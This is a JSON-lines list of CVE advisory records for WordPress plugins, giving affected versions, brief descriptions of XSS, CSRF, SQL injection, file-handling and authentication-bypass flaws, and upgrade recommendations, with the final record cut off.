{"CVE_ID":"CVE-2025-1232","slug":"site-reviews","versionImpact":"7.2.4","versionEndExcluding":"7.2.5","description":"The Site Reviews WordPress plugin before 7.2.5 does not properly sanitise and escape some of its Review fields, which could allow unauthenticated users to perform Stored XSS attacks","recommendation":"Update to version 7.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c4ea8357-ddd7-48ac-80c9-15b924715b14\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c4ea8357-ddd7-48ac-80c9-15b924715b14\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1538","slug":"wp-file-manager","versionImpact":"7.2.4","versionEndExcluding":"7.2.5","description":"The File Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 7.2.4. This is due to missing or incorrect nonce validation on the wp_file_manager page that includes files through the 'lang' parameter. This makes it possible for unauthenticated attackers to include local JavaScript files that can be leveraged to achieve RCE via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This issue was partially patched in version 7.2.4, and fully patched in 7.2.5.","recommendation":"Update to version 7.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57cc15a6-2cf5-481f-bb81-ada48aa74009?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57cc15a6-2cf5-481f-bb81-ada48aa74009?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3051451\\\/wp-file-manager\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3051451\\\/wp-file-manager\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12278","slug":"woocommerce-jetpack","versionImpact":"7.2.4","versionEndExcluding":"7.2.5","description":"The Booster for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via any location that typically sanitizes data using wp_kses, like comments, in all versions up to, and including, 7.2.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/trunk\\\/includes\\\/functions\\\/wcj-functions-general.php#L1015\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/trunk\\\/includes\\\/functions\\\/wcj-functions-general.php#L1015\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262569\\\/woocommerce-jetpack\\\/trunk\\\/includes\\\/functions\\\/wcj-functions-general.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262569\\\/woocommerce-jetpack\\\/trunk\\\/includes\\\/functions\\\/wcj-functions-general.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/234789db-1440-40ac-83e7-b8afb0ba4b5f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/234789db-1440-40ac-83e7-b8afb0ba4b5f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9239","slug":"woocommerce-jetpack","versionImpact":"7.2.3","versionEndExcluding":"7.2.4","description":"The Booster for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 7.2.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 7.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4665b87-e1f8-4a73-b6d6-1d5c14067b3a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4665b87-e1f8-4a73-b6d6-1d5c14067b3a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/tags\\\/7.2.3\\\/includes\\\/settings\\\/wcj-settings-pdf-invoicing-advanced.php#L53\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/tags\\\/7.2.3\\\/includes\\\/settings\\\/wcj-settings-pdf-invoicing-advanced.php#L53\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/tags\\\/7.2.3\\\/includes\\\/tools\\\/class-wcj-order-statuses-tool.php#L319\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/tags\\\/7.2.3\\\/includes\\\/tools\\\/class-wcj-order-statuses-tool.php#L319\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3187178%40woocommerce-jetpack&new=3187178%40woocommerce-jetpack&sfp_email=&sfph_mail=#file5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3187178%40woocommerce-jetpack&new=3187178%40woocommerce-jetpack&sfp_email=&sfph_mail=#file5\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6766","slug":"shortcodes-ultimate-pro","versionImpact":"7.2.0","versionEndExcluding":"7.2.1","description":"The shortcodes-ultimate-pro WordPress plugin before 7.2.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 7.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/77bb1dcf-4e84-497a-955e-f3c0b649ad1c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/77bb1dcf-4e84-497a-955e-f3c0b649ad1c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3936","slug":"blog2social","versionEndExcluding":"7.2.1","description":"The Blog2Social WordPress plugin before 7.2.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6d09a5d3-046d-47ef-86b4-c024ea09dc0f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6d09a5d3-046d-47ef-86b4-c024ea09dc0f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11733","slug":"wordpress-popular-posts","versionImpact":"7.1.0","versionEndExcluding":"7.2.0","description":"The WordPress Popular Posts plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 7.1.0. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 7.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-popular-posts\\\/tags\\\/7.1.0\\\/src\\\/Rest\\\/ViewLoggerEndpoint.php#L70\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-popular-posts\\\/tags\\\/7.1.0\\\/src\\\/Rest\\\/ViewLoggerEndpoint.php#L70\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c38ac8d6-c6de-4be7-bf7b-198e085a0ad2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c38ac8d6-c6de-4be7-bf7b-198e085a0ad2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5436","slug":"vertical-marquee-plugin","versionImpact":"7.1","versionEndExcluding":"7.2","description":"The Vertical marquee plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 7.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd90d9c0-0cab-4fd3-b016-106032f300f7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd90d9c0-0cab-4fd3-b016-106032f300f7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vertical-marquee-plugin\\\/trunk\\\/vertical-marquee-plugin.php?rev=2827080#L170\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vertical-marquee-plugin\\\/trunk\\\/vertical-marquee-plugin.php?rev=2827080#L170\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985561\\\/vertical-marquee-plugin#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985561\\\/vertical-marquee-plugin#file2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2008","slug":"wp-ultimate-csv-importer","versionImpact":"7.20","versionEndExcluding":"7.19.1","description":"The Import Export Suite for CSV and XML Datafeed plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the import_single_post_as_csv() function in all versions up to, and including, 7.19. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to one of the following versions, or a newer patched version: 7.19.1, 7.20.1","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261521\\\/wp-ultimate-csv-importer\\\/trunk\\\/SingleImportExport.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261521\\\/wp-ultimate-csv-importer\\\/trunk\\\/SingleImportExport.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a114faf9-cada-4132-abe3-c0137b66e276?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a114faf9-cada-4132-abe3-c0137b66e276?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2007","slug":"wp-ultimate-csv-importer","versionImpact":"7.20","versionEndExcluding":"7.19.1","description":"The Import Export Suite for CSV and XML Datafeed plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the deleteImage() function in all versions up to, and including, 7.19. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to one of the following versions, or a newer patched version: 7.19.1, 7.20.1","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261521\\\/wp-ultimate-csv-importer\\\/trunk\\\/MediaHandling.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261521\\\/wp-ultimate-csv-importer\\\/trunk\\\/MediaHandling.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3923c732-80b5-4a04-80dd-b4d5b5e5567d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3923c732-80b5-4a04-80dd-b4d5b5e5567d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13230","slug":"super-socializer","versionImpact":"7.14","versionEndExcluding":"7.14.1","description":"The Social Share, Social Login and Social Comments Plugin \u2013 Super Socializer plugin for WordPress is vulnerable to Limited SQL Injection via the \u2018SuperSocializerKey\u2019 parameter in all versions up to, and including, 7.14 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional values into the already existing query that can be used to extract user metadata from the database.","recommendation":"Update to version 7.14.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/super-socializer\\\/trunk\\\/super_socializer.php#L291\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/super-socializer\\\/trunk\\\/super_socializer.php#L291\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3225440\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3225440\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d7b2a7f-3c67-4df1-bb15-e7f4f0035953?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d7b2a7f-3c67-4df1-bb15-e7f4f0035953?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9946","slug":"super-socializer","versionImpact":"7.13.68","versionEndExcluding":"7.14","description":"The Social Share, Social Login and Social Comments Plugin \u2013 Super Socializer plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 7.13.68. This is due to insufficient verification on the user being returned by the social login token. This makes it possible for unauthenticated attackers to log in as any existing user on the site, if they have access to the email and the user does not have an already-existing account for the service returning the token. An attacker cannot authenticate as an administrator by default, but these accounts are also at risk if authentication for administrators has explicitly been allowed via the social login. The vulnerability was partially patched in version 7.13.68.","recommendation":"Update to version 7.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c394b8b6-b7f6-4ba7-8a2b-98160cc286a8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c394b8b6-b7f6-4ba7-8a2b-98160cc286a8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3172935\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3172935\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3180581\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3180581\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2779","slug":"super-socializer","versionEndExcluding":"7.13.52","description":"The Social Share, Social Login and Social Comments WordPress plugin before 7.13.52 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fe9b7696-3b0e-42e2-9dbc-55167605f5c5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fe9b7696-3b0e-42e2-9dbc-55167605f5c5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0082","slug":"google-analytics-dashboard-for-wp","versionEndExcluding":"7.12.1","description":"The ExactMetrics WordPress plugin before 7.12.1 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e1ba5047-0c39-478f-89c7-b0bb638efdff\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e1ba5047-0c39-478f-89c7-b0bb638efdff\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4575","slug":"LayerSlider","versionImpact":"7.11.0","versionEndExcluding":"7.11.1","description":"The LayerSlider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ls_search_form shortcode in version 7.11.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.11.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4fa4167a-686f-4fd0-a53d-eb61d57228a1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4fa4167a-686f-4fd0-a53d-eb61d57228a1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/layerslider.com\\\/release-log\\\/\",\"name\":\"https:\\\/\\\/layerslider.com\\\/release-log\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7422","slug":"theme-my-login","versionImpact":"7.1.7","versionEndExcluding":"7.1.8","description":"The Theme My Login plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 7.1.7. This is due to missing or incorrect nonce validation on the tml_admin_save_ms_settings() function. This makes it possible for unauthenticated attackers to update the theme's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Please note that this only affects multi-site instances.","recommendation":"Update to version 7.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fb8e956-3a95-4e55-9816-be7eddb5835d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fb8e956-3a95-4e55-9816-be7eddb5835d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3135854\\\/theme-my-login\\\/trunk\\\/admin\\\/settings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3135854\\\/theme-my-login\\\/trunk\\\/admin\\\/settings.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7758","slug":"stylish-price-list","versionImpact":"7.1.7","versionEndExcluding":"7.1.8","description":"The Stylish Price List  WordPress plugin before 7.1.8 does not sanitise and escape some of its settings, which could allow high privilege users of contributor and above to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 7.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0bf39a29-a605-407b-9ab0-a82437d16153\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0bf39a29-a605-407b-9ab0-a82437d16153\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4821","slug":"shortcodes-ultimate","versionImpact":"7.1.6","versionEndExcluding":"7.1.7","description":"The WP Shortcodes Plugin \u2014 Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's su_lightbox shortcode in all versions up to, and including, 7.1.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec7649da-5358-4fe2-8706-b945bba02c93?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec7649da-5358-4fe2-8706-b945bba02c93?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.1.5\\\/includes\\\/shortcodes\\\/lightbox.php#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.1.5\\\/includes\\\/shortcodes\\\/lightbox.php#L71\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3096024%40shortcodes-ultimate%2Ftrunk&old=3084162%40shortcodes-ultimate%2Ftrunk&sfp_email=&sfph_mail=#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3096024%40shortcodes-ultimate%2Ftrunk&old=3084162%40shortcodes-ultimate%2Ftrunk&sfp_email=&sfph_mail=#file1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1054","slug":"woocommerce-jetpack","versionImpact":"7.1.6","versionEndExcluding":"7.1.7","description":"The Booster for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wcj_product_barcode' shortcode in all versions up to, and including, 7.1.6 due to insufficient input sanitization and output escaping on user supplied attributes like 'color'. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0b86c45-c346-4df7-844e-01de027bbc1e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0b86c45-c346-4df7-844e-01de027bbc1e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3034358%40woocommerce-jetpack&new=3034358%40woocommerce-jetpack&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3034358%40woocommerce-jetpack&new=3034358%40woocommerce-jetpack&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4553","slug":"shortcodes-ultimate","versionImpact":"7.1.5","versionEndExcluding":"7.1.6","description":"The WP Shortcodes Plugin \u2014 Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'su_members' shortcode in all versions up to, and including, 7.1.5 due to insufficient input sanitization and output escaping on user supplied 'color' attribute. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d8db8ed5-ebeb-4102-928f-fe417e429ad2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d8db8ed5-ebeb-4102-928f-fe417e429ad2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.1.4\\\/includes\\\/shortcodes\\\/members.php#L83\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.1.4\\\/includes\\\/shortcodes\\\/members.php#L83\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084162\\\/#file524\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084162\\\/#file524\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4217","slug":"shortcodes-ultimate-pro","versionImpact":"7.1.4","versionEndExcluding":"7.1.5","description":"The shortcodes-ultimate-pro WordPress plugin before 7.1.5 does not properly escape some of its shortcodes' settings, making it possible for attackers with a Contributor account to conduct Stored XSS attacks.","recommendation":"Update to version 7.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/55cb43bf-7c8f-4df7-b4de-bf2bb1c2766d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/55cb43bf-7c8f-4df7-b4de-bf2bb1c2766d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3550","slug":"shortcodes-ultimate","versionImpact":"7.1.2","versionEndExcluding":"7.1.3","description":"The WP Shortcodes Plugin \u2014 Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 7.1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf7b0f1b-a6d3-4a96-adaa-0adeb6ea2efd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf7b0f1b-a6d3-4a96-adaa-0adeb6ea2efd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/functions-html.php#L51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/functions-html.php#L51\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/shortcodes\\\/lightbox.php#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/shortcodes\\\/lightbox.php#L71\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/shortcodes\\\/service.php#L93\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/shortcodes\\\/service.php#L93\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/shortcodes\\\/dailymotion.php#L141\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/shortcodes\\\/dailymotion.php#L141\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3069959%40shortcodes-ultimate%2Ftrunk&old=3069892%40shortcodes-ultimate%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3069959%40shortcodes-ultimate%2Ftrunk&old=3069892%40shortcodes-ultimate%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5638","slug":"woocommerce-jetpack","versionImpact":"7.1.2","versionEndExcluding":"7.1.3","description":"The Booster for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'wcj_image' shortcode in versions up to, and including, 7.1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.1.3, or a newer patched 